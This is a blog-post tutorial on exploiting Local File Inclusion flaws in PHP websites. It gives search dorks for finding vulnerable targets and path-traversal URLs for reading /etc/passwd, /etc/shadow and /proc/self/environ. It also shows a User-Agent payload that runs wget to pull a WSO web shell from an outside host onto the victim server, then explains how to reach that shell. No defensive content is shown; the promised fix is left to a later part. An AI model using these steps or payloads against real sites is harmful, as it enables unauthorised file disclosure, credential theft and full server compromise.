Home Unlabelled Local File Inclusion(LFI) Tutorial

Local File Inclusion(LFI) Tutorial

By
Monday, May 30, 2016
Read
Add Comment
SO FIRST THING IS WHAT IS LFI ?LFI means Local File Inclusion. Through LFI vulnerability u can read files on a website/server via your browser.
First of all u need a LFI vulnerable website.There are many softwares to check the LFI vuln in websites.Also there are some dorks to find LFI vuln sites..
Just put inurl:.php before using dork like:
inurl:.view.php?id=
acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
contact=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url= 

After using these dorks u can find many websites but all are not vulnerable by LFI.
But u can find sites which is vulnerable by LFI.

Example i can find a website :
www.victimsite.com/action.php?page=contact.php
Now we are going to check it is vuln or not so that we can replace contact.php with ../ so the url become.

www.victimsite.com/action.php?page=../

check the source code and chck if u got this error
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/victimsite.com/action.php on line 1337
If u got this shitty error or some thing like this there is a large chances that website is vuln by LFI.
Or if u get blank page so website is not vuln by LFI.

Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :
www.victimsite.com/action.php?page=../../../etc/passwd
we got error and no etc/passwd file.
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
so we go more directories up to find etc/passwd file..
www.victimsite.com/action.php?page=../../../../../../etc/passwd
we succesfully included the etc/passwd file.
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

There are alsao good directories that can u visit :-)
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
Checking if proc/self/environ is accessible.

 Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ
www.victimsite.com/action.php?page=../../../../../proc/self/environ
If u get something like this :
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=../../../../../../proc/self/environ REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=../../../../../../proc/self/environ SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.example.com Port 80
proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible.

Now how to inject malicious code ?
Now  inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :

Choose Tamper and in User-Agent filed write the following code : TAMPER DATA IS AN ADDON OF MOZILLA FIREFOX ..JUST GOOGLE IT YOU FIND IT...
system(‘wget http://www.drivehq.com/web/username/your shellname.txt -O shell.php’);?>
EXAMPLE :
system(‘wget http://abcxyz.0adz.com/WSO.txt -O shell.php’);?>
If don work,try exec() because system() can be disabled on the webserver from php.ini.

It is not important to upload ur shell in drivehq u can use ur own site or othe free web hosting sites..
system(‘wget http://abcxyz.0adz.com/WSO.txt -O shell.php’);?>
After u upload ur shell through this code u can access ur shell.
www.victimsite.com/shell.php
THANKS FOR READING....

In part 2 i will teach u How to fix LFi vulnerability :)

It's All about LFi..
Commnet Below OR Give Us Your Feedback , ON FACEBOOK..
LIKES US ON FACEBOOK By Clicking Here

Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us